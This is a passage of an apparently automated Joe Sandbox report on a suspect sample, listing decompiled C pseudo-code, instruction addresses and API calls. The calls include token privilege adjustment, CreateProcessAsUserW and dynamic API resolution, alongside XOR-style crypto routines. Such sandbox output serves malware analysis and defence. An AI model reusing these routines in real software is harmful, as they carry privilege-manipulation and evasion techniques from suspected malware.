      • Part of subcall function 0039C320: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0039C4BD
      • Part of subcall function 0039C320: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0039C5A5
      • Part of subcall function 0039C320: GetLastError.KERNEL32 ref: 0039C5AB
      • Part of subcall function 0039C320: GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0039C5EC
      • Part of subcall function 0039C320: CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0039C6F2
      • Part of subcall function 0039C320: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0039C783
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0BB0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
    C-Code - Quality: 95%
    			E003B0BB0(void* __ebx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v216;
				char _v416;
				void* _t29;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t42 = __ebx;
				_v8 = 0;
				_v12 = 0;
				E00399090(__eflags,  &_v216, 0xcf);
				_t54 =  *0x3b8628; // 0x593938
				_t67 = _t66 + 8;
				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0xe4))))( &_v216, 0x80000000, 1, 0, 3, 0x80, 0);
				_t72 = _t29 - 0xffffffff;
				if(_t29 != 0xffffffff) {
					L2:
					_t55 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xf8))))(_t29);
					E00399090(_t73,  &_v416, 3);
					_t34 = E0039F550( &_v416, 0,  &_v416, 0xa,  &_v8,  &_v12);
					_t68 = _t67 + 0x1c;
					if(_t34 == 0) {
						L13:
						return _t34;
					}
					_push(8);
					L0039A47E();
					_t69 = _t68 + 4;
					if(_t34 == 0) {
						_t64 = 0;
						L6:
						_t35 = E003969F0(_t34, _t64,  &_v16);
						_t69 = _t69 + 8;
						_t78 = _t35 - 1;
						if(_t35 == 1) {
							_v8 = 0;
							_v12 = 0;
							E00399090(_t78,  &_v416, 0x12);
							_t35 = E0039F550( &_v8, 0,  &_v416, 0xa,  &_v8,  &_v12);
							_t69 = _t69 + 0x1c;
							if(_t35 != 0) {
								_t35 = _v8;
								if(_t35 != 0) {
									E003B0900(_t42, _t35, _v12);
									_t35 = E0039BB40(_v8);
									_t69 = _t69 + 0xc;
								}
							}
						}
						L10:
						if(_t64 != 0) {
							_t35 = E00391700(_t64);
							_push(_t64);
							L00391CB0();
						}
						return _t35;
					}
					_t64 = _t34;
					if(_t64 == 0) {
						goto L6;
					}
					_t35 = E00391F00(_t64, _v8, _v12);
					if(_t35 == 0) {
						goto L10;
					}
					goto L6;
				}
				E00399090(_t72,  &_v216, 0x10);
				_t41 =  *0x3b8628; // 0x593938
				_t67 = _t67 + 8;
				_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xe4))))( &_v216, 0x80000000, 1, 0, 3, 0x80, 0);
				_t73 = _t34 - 0xffffffff;
				if(_t34 == 0xffffffff) {
					goto L13;
				}
				goto L2;
			}




















    0x003b0bb0
    0x003b0bc8
    0x003b0bcb
    0x003b0bce
    0x003b0bd3
    0x003b0bdf
    0x003b0bf9
    0x003b0bfb
    0x003b0bfe
    0x003b0c3e
    0x003b0c3e
    0x003b0c4b
    0x003b0c56
    0x003b0c6d
    0x003b0c72
    0x003b0c77
    0x003b0d2a
    0x003b0d2a
    0x003b0d2a
    0x003b0c7e
    0x003b0c80
    0x003b0c85
    0x003b0c8a
    0x003b0d2b
    0x003b0cb0
    0x003b0cb5
    0x003b0cba
    0x003b0cbd
    0x003b0cc0
    0x003b0ccb
    0x003b0cce
    0x003b0cd1
    0x003b0ce8
    0x003b0ced
    0x003b0cf2
    0x003b0cf4
    0x003b0cf9
    0x003b0d00
    0x003b0d09
    0x003b0d0e
    0x003b0d0e
    0x003b0cf9
    0x003b0cf2
    0x003b0d11
    0x003b0d13
    0x003b0d17
    0x003b0d1c
    0x003b0d1d
    0x003b0d22
    0x00000000
    0x003b0d25
    0x003b0c97
    0x003b0c9b
    0x00000000
    0x00000000
    0x003b0ca7
    0x003b0cae
    0x00000000
    0x00000000
    0x00000000
    0x003b0cae
    0x003b0c09
    0x003b0c0e
    0x003b0c19
    0x003b0c33
    0x003b0c35
    0x003b0c38
    0x00000000
    0x00000000
    0x00000000

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0C80
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A09
      • Part of subcall function 003969F0: ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B34
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 003969F0: ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0D1D
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00391F00: memcpy.MSVCRT ref: 00391F9C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F3E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128
    C-Code - Quality: 86%
    			E0039F3E0(intOrPtr _a4, intOrPtr _a8, void** _a12, int* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				void* _t39;
				int _t48;
				short* _t50;
				intOrPtr _t51;
				void* _t52;
				void* _t53;
				int _t56;
				int _t69;
				int _t70;
				intOrPtr _t71;
				signed int _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;

				_t71 = _a4;
				_t69 = 0;
				_t56 = 0;
				_v12 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				if(_t71 != 0) {
					_t39 = E00391170(_t71, 0,  &_v12, _a8);
					_t76 = _t75 + 0x10;
					if(_t39 != 0) {
						_t48 = E00397B80(_v12, 0x3b3310,  &_v8, 6);
						_t76 = _t76 + 0x10;
						_v20 = _t48;
						if(_t48 == 6) {
							__imp___wtoi( *((intOrPtr*)(_v8 + 0x10)));
							_t56 = _t48;
							_t76 = _t76 + 4;
							if(_t56 > 0) {
								_t50 =  *((intOrPtr*)(_v8 + 0x14));
								if( *_t50 == 0xd &&  *((short*)(_t50 + 2)) == 0xa) {
									_t73 = _t71 + 1;
									do {
										_t51 =  *0x3b8628; // 0x593938
										_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xc))))( *((intOrPtr*)(_t69 + _v8)));
										_t69 = _t69 + 4;
										_t21 = _t52 + 1; // 0x3b8628
										_t73 = _t73 + _t21;
									} while (_t69 < 0x14);
									_t74 = _t73 + 2;
									if( *((char*)(_t74 + _t56)) == 0xd &&  *((char*)(_t74 + _t56 + 1)) == 0xa) {
										_t53 = E003A1D90(_t56, 0);
										_t76 = _t76 + 8;
										_v16 = _t53;
										if(_t53 != 0) {
											memcpy(_t53, _t74, _t56);
											_t76 = _t76 + 0xc;
											_v24 = 1;
										}
									}
									_t69 = 0;
								}
							} else {
								_t56 = 0;
							}
						}
					}
					_t40 = _v12;
					if(_v12 != _t69) {
						E0039BB40(_t40);
						_t76 = _t76 + 4;
					}
					if(_v8 != _t69) {
						_t70 = _v20;
						_t72 = 0;
						if(_t70 > 0) {
							do {
								E0039BB40( *((intOrPtr*)(_v8 + _t72 * 4)));
								_t72 = _t72 + 1;
								_t76 = _t76 + 4;
							} while (_t72 < _t70);
						}
						E0039BB40(_v8);
					}
					 *_a12 = _v16;
					 *_a16 = _t56;
					return _v24;
				} else {
					return 0;
				}
			}























    0x0039f3e8
    0x0039f3ec
    0x0039f3ee
    0x0039f3f0
    0x0039f3f3
    0x0039f3f6
    0x0039f3f9
    0x0039f3fc
    0x0039f401
    0x0039f418
    0x0039f41d
    0x0039f422
    0x0039f437
    0x0039f43c
    0x0039f43f
    0x0039f445
    0x0039f452
    0x0039f458
    0x0039f45a
    0x0039f45f
    0x0039f468
    0x0039f46f
    0x0039f478
    0x0039f480
    0x0039f486
    0x0039f48f
    0x0039f491
    0x0039f494
    0x0039f494
    0x0039f498
    0x0039f49d
    0x0039f4a4
    0x0039f4b0
    0x0039f4b5
    0x0039f4b8
    0x0039f4bd
    0x0039f4c4
    0x0039f4c9
    0x0039f4cc
    0x0039f4cc
    0x0039f4bd
    0x0039f4d3
    0x0039f4d3
    0x0039f461
    0x0039f461
    0x0039f461
    0x0039f45f
    0x0039f445
    0x0039f4d5
    0x0039f4da
    0x0039f4dd
    0x0039f4e2
    0x0039f4e2
    0x0039f4e8
    0x0039f4ea
    0x0039f4ed
    0x0039f4f1
    0x0039f4f3
    0x0039f4fa
    0x0039f4ff
    0x0039f500
    0x0039f503
    0x0039f4f3
    0x0039f50b
    0x0039f510
    0x0039f51d
    0x0039f523
    0x0039f529
    0x0039f405
    0x0039f40b
    0x0039f40b

    APIs
    • _wtoi.MSVCRT ref: 0039F452
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 0039F4C4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393630, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
    C-Code - Quality: 58%
    			E00393630(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				signed int _t20;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t32;

				_t30 = _a8;
				_t32 = __ecx;
				_t3 = _t32 + 0x78; // 0x78
				_t4 = _t32 + 0x74; // 0x74
				if(E00391050(__ecx, _a4, _t30, _t4, _t3) == 0 || E003A1870(__ecx) == 0) {
					return 0;
				} else {
					_t14 =  *((intOrPtr*)(__ecx + 0x10));
					if(_t14 != 0) {
						__imp__#6(_t14);
					}
					_t15 =  *0x3b8628; // 0x593938
					_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x1d4))))(_t30);
					_t29 =  *0x3b8628; // 0x593938
					_t31 = _t16;
					_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1ec))))(_t31) - _t31 >> 1;
					__imp__#4(_t31, _t20);
					 *(_t32 + 0x10) = _t20;
					 *((intOrPtr*)(_t32 + 0x64)) = 1;
					return 1;
				}
			}











    0x00393639
    0x0039363c
    0x0039363e
    0x00393642
    0x00393653
    0x003936b1
    0x00393660
    0x00393660
    0x00393665
    0x00393668
    0x00393668
    0x0039366e
    0x0039367a
    0x0039367c
    0x00393682
    0x0039368f
    0x00393693
    0x00393699
    0x003936a2
    0x003936a8
    0x003936a8

    APIs
      • Part of subcall function 00391050: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?), ref: 00391083
      • Part of subcall function 00391050: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0039109C
      • Part of subcall function 00391050: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 003910B1
      • Part of subcall function 00391050: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003910DE
    • SysFreeString.OLEAUT32(?), ref: 00393668
    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00393693
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
    C-Code - Quality: 84%
    			E003B0840(intOrPtr* __ecx, signed char _a4) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t14;
				intOrPtr* _t15;
				void* _t16;

				_t15 = __ecx;
				_t6 =  *((intOrPtr*)(__ecx + 8));
				 *__ecx = 0x3b32ec;
				if(_t6 != 0) {
					_push(_t6);
					L00391CB0();
					_t16 = _t16 + 4;
				}
				_t7 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t7 + 0xac))))(0x3b8600);
				_t14 =  *0x3b8628; // 0x593938
				 *0x3b8618 =  *0x3b8618 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t14 + 0xc4))))(0x3b8600);
				if((_a4 & 0x00000001) != 0) {
					_push(_t15);
					L00391CB0();
				}
				return _t15;
			}








    0x003b0844
    0x003b0846
    0x003b0849
    0x003b0851
    0x003b0853
    0x003b0854
    0x003b0859
    0x003b0859
    0x003b085c
    0x003b086c
    0x003b086e
    0x003b0874
    0x003b0885
    0x003b088b
    0x003b088d
    0x003b088e
    0x003b0893
    0x003b089a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AED7D, Relevance: 5.2, APIs: 4, Instructions: 200
    C-Code - Quality: 33%
    			E003AED7D(void* __eax, int __ecx, signed int __edx, void* _a4, void* _a8, void* _a12, int _a16, intOrPtr _a20, signed int _a24) {
				void* _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				signed int _v28;
				void* _v32;
				void _v52;
				void _v72;
				signed int _t82;
				void* _t85;
				int _t86;
				signed int _t98;
				signed int _t104;
				signed int _t105;
				signed int* _t110;
				void* _t122;
				int _t123;
				int _t124;
				intOrPtr _t128;
				signed int _t135;
				signed int _t136;
				void* _t142;
				signed int _t144;
				signed int _t146;
				signed int _t152;
				signed int _t155;
				void* _t156;
				void* _t157;
				void* _t167;
				int _t169;
				void* _t172;
				void* _t177;
				void* _t181;
				void* _t183;
				void* _t189;

				_t152 = __edx;
				asm("cdq");
				_t82 = __eax - __edx >> 1;
				_v12 = _t82;
				_t123 = __ecx;
				_v16 = _t82 + _a4;
				_t157 =  *0x3b8538(0x200, _t156, _t167, _t122);
				_v32 = _t157;
				_t85 =  *0x3b8538(0x200);
				_v8 = _t85;
				_t86 =  *0x3b8538(0x200);
				_v24 = _t86;
				_v20 =  *0x3b8538(0x200);
				memcpy(_t157, _a8, __ecx);
				_t169 = _a16;
				memcpy(_t157 + _t123, _a12, _t169);
				_t124 = _t123 + _t169;
				E003AEB87(_a4, _v12, _t157, _t124,  &_v52);
				memcpy(_v8 + 0x10, _t157, _t124);
				asm("cdq");
				_t181 = _t177 + 0x38;
				_t98 = _a24 + (_t152 & 0x0000000f) >> 4;
				_t135 = _a24 & 0x8000000f;
				if(_t135 < 0) {
					_t189 = (_t135 - 0x00000001 | 0xfffffff0) + 1;
				}
				if(_t189 != 0) {
					_t98 = _t98 + 1;
				}
				if(_t98 > 0) {
					_a16 = _v24;
					_v28 = _t98;
					do {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E003AEB87(_a4, _v12, _v8, _t124 + 0x10, _a16);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E003AEB87(_a4, _v12,  &_v72, 0x10,  &_v52);
						_a16 = _a16 + 0x10;
						_t181 = _t181 + 0x28;
						_t36 =  &_v28;
						 *_t36 = _v28 - 1;
					} while ( *_t36 != 0);
					_t157 = _v32;
				}
				E003AEC77(_v16, _v12, _t157, _t124,  &_v52);
				memcpy(_v8 + 0x14, _t157, _t124);
				_t104 = _a24;
				_t183 = _t181 + 0x20;
				asm("cdq");
				_t136 = 0x14;
				_t105 = _t104 / _t136;
				if(_t104 % _t136 != 0) {
					_t105 = _t105 + 1;
				}
				if(_t105 > 0) {
					_t128 = _t124 + 0x14;
					_a4 = _v20;
					_a16 = _t105;
					do {
						_t144 = 5;
						memcpy(_v8,  &_v52, _t144 << 2);
						E003AEC77(_v16, _v12, _v8, _t128, _a4);
						_t146 = 5;
						memcpy( &_v72,  &_v52, _t146 << 2);
						E003AEC77(_v16, _v12,  &_v72, 0x14,  &_v52);
						_a4 = _a4 + 0x14;
						_t183 = _t183 + 0x40;
						_t67 =  &_a16;
						 *_t67 = _a16 - 1;
					} while ( *_t67 != 0);
					_t157 = _v32;
				}
				if(_a24 > 0) {
					_t110 = _v24;
					_t155 = _a24;
					_t142 = _v20 - _t110;
					_t172 = _a20 - _t110;
					do {
						 *(_t172 + _t110) =  *(_t142 + _t110) ^  *_t110;
						_t110 =  &(_t110[0]);
						_t155 = _t155 - 1;
					} while (_t155 != 0);
				}
				 *0x3b8540(_v20);
				 *0x3b8540(_v24);
				 *0x3b8540(_v8);
				return  *0x3b8540(_t157);
			}







































    0x003aed7d
    0x003aed83
    0x003aed87
    0x003aed8a
    0x003aed97
    0x003aed99
    0x003aeda3
    0x003aeda6
    0x003aeda9
    0x003aedb1
    0x003aedb4
    0x003aedbc
    0x003aedca
    0x003aedce
    0x003aedd3
    0x003aede1
    0x003aeded
    0x003aedf7
    0x003aee08
    0x003aee13
    0x003aee19
    0x003aee1c
    0x003aee1f
    0x003aee25
    0x003aee2b
    0x003aee2b
    0x003aee2c
    0x003aee2e
    0x003aee2e
    0x003aee31
    0x003aee36
    0x003aee39
    0x003aee3c
    0x003aee45
    0x003aee4d
    0x003aee51
    0x003aee55
    0x003aee56
    0x003aee64
    0x003aee69
    0x003aee73
    0x003aee77
    0x003aee78
    0x003aee7d
    0x003aee81
    0x003aee84
    0x003aee84
    0x003aee84
    0x003aee89
    0x003aee89
    0x003aee98
    0x003aeea9
    0x003aeeae
    0x003aeeb1
    0x003aeeb6
    0x003aeeb7
    0x003aeeb8
    0x003aeebc
    0x003aeebe
    0x003aeebe
    0x003aeec1
    0x003aeec6
    0x003aeec9
    0x003aeecc
    0x003aeecf
    0x003aeed4
    0x003aeedf
    0x003aeee7
    0x003aeef1
    0x003aef08
    0x003aef0a
    0x003aef0f
    0x003aef13
    0x003aef16
    0x003aef16
    0x003aef16
    0x003aef1b
    0x003aef1b
    0x003aef22
    0x003aef24
    0x003aef2d
    0x003aef30
    0x003aef32
    0x003aef34
    0x003aef39
    0x003aef3c
    0x003aef3d
    0x003aef3d
    0x003aef34
    0x003aef43
    0x003aef4d
    0x003aef57
    0x003aef6a

    APIs
    • memcpy.MSVCRT ref: 003AEDCE
    • memcpy.MSVCRT ref: 003AEDE1
      • Part of subcall function 003AEB87: memset.MSVCRT ref: 003AEB9D
      • Part of subcall function 003AEB87: memset.MSVCRT ref: 003AEBAD
      • Part of subcall function 003AEB87: memcpy.MSVCRT ref: 003AEBBF
      • Part of subcall function 003AEB87: memcpy.MSVCRT ref: 003AEBD1
    • memcpy.MSVCRT ref: 003AEE08
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC88
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC98
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECA7
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECB9
    • memcpy.MSVCRT ref: 003AEEA9
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd